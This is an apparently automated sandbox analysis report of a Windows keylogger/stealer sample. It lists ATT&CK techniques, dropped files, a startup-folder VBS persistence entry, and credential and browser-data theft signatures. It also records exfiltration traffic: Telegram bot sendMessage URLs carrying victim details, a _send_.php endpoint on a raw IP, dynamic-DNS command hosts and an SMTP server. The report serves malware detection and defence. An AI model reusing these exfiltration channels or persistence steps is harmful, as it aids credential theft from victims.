              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              2
              Valid Accounts
              2
              Native API
              111
              Scripting
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              4
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts
              2
              Valid Accounts
              3
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder
              21
              Access Token Manipulation
              1
              DLL Side-Loading
              NTDS127
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              1
              Non-Standard Port
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
              Process Injection
              1
              Masquerading
              LSA Secrets231
              Security Software Discovery
              SSH3
              Clipboard Data
              3
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
              Registry Run Keys / Startup Folder
              2
              Valid Accounts
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture24
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529782 Sample: kG713MWffq.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 52 9 other signatures 2->52 8 kG713MWffq.exe 3 2->8         started        11 wscript.exe 1 2->11         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\vexplores.exe, PE32 8->26 dropped 14 vexplores.exe 1 8->14         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->60 18 vexplores.exe 11->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\vexplores.vbs, data 14->28 dropped 62 Antivirus detection for dropped file 14->62 64 Multi AV Scanner detection for dropped file 14->64 66 Machine Learning detection for dropped file 14->66 72 2 other signatures 14->72 20 svchost.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 svchost.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49724, 49744 TELEGRAMRU United Kingdom 20->36 38 checkip.dyndns.com 193.122.6.168, 49707, 49710, 49712 ORACLE-BMC-31898US United States 20->38 40 2 other IPs or domains 20->40 54 System process connects to network (likely due to code injection or exploit) 24->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal browser information (history, passwords, etc) 24->58 signatures12

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              kG713MWffq.exe68%ReversingLabsWin32.Spyware.Snakekeylogger
              kG713MWffq.exe100%AviraHEUR/AGEN.1321293
              kG713MWffq.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Videos\vexplores.exe100%AviraHEUR/AGEN.1321293
              C:\Users\user\AppData\Local\Videos\vexplores.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Videos\vexplores.exe68%ReversingLabsWin32.Ransomware.RedLine
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              smtp.zoho.eu
              185.230.214.164
              truetrue
                unknown
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    checkip.dyndns.com
                    193.122.6.168
                    truetrue
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.33true
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2009/10/2024%20/%2018:08:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dtrue
                          unknown
                          http://checkip.dyndns.org/true
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2009/10/2024%20/%2017:58:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dtrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/svchost.exe, 00000007.00000002.3867939466.0000000005AAC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://duckduckgo.com/chrome_newtabsvchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://duckduckgo.com/ac/?q=svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orgsvchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20asvchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://api.telegram.org/botsvchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpfalse
                                      unknown
                                      http://cdp.thawte.com/ThawteTLSRSACAG1.crl0psvchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872831902.0000000007F27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://www.office.com/lBsvchost.exe, 00000004.00000002.3867759274.0000000005596000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.office.com/Hsvchost.exe, 00000007.00000002.3867939466.0000000005A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://checkip.dyndns.orgsvchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://chrome.google.com/webstore?hl=ensvchost.exe, 00000007.00000002.3867939466.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.ecosia.org/newtab/svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872831902.0000000007F27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://varders.kozow.com:8081svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    unknown
                                                    http://smtp.zoho.eusvchost.exe, 00000004.00000002.3867759274.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://aborters.duckdns.org:8081svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpfalse
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://51.38.247.67:8081/_send_.php?Lsvchost.exe, 00000004.00000002.3867759274.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://reallyfreegeoip.org/xml/8.46.123.33$svchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.000000000546A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059BF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://anotherarmy.dns.army:8081svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpfalse
                                                            unknown
                                                            http://status.thawte.com0:svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872831902.0000000007F27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://checkip.dyndns.org/qsvchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://chrome.google.com/webstore?hl=enlBsvchost.exe, 00000004.00000002.3867759274.0000000005565000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://reallyfreegeoip.orgsvchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.000000000543F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059BF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsvchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://reallyfreegeoip.org/xml/svchost.exe, 00000004.00000002.3867759274.000000000543F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUtrue
                                                                  188.114.97.3
                                                                  reallyfreegeoip.orgEuropean Union
                                                                  13335CLOUDFLARENETUStrue
                                                                  193.122.6.168
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898UStrue
                                                                  185.230.214.164
                                                                  smtp.zoho.euNetherlands
                                                                  41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHtrue
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1529782
                                                                  Start date and time:2024-10-09 12:12:06 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 10m 33s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:kG713MWffq.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:234de89344361f41fff065be295947074a51257428f12838e535c2ec5ca37ced.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 59
                                                                  • Number of non-executed functions: 303
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • VT rate limit hit for: kG713MWffq.exe
                                                                  TimeTypeDescription
                                                                  06:13:22API Interceptor12787763x Sleep call for process: svchost.exe modified
                                                                  12:13:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.2209WFX0d4wa8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    Agency Appointment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      rShipmentNotification_.exeGet hashmaliciousAgentTeslaBrowse
                                                                        AkIhFFUNs2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          z10RFQ-202401.exeGet hashmaliciousDarkCloudBrowse
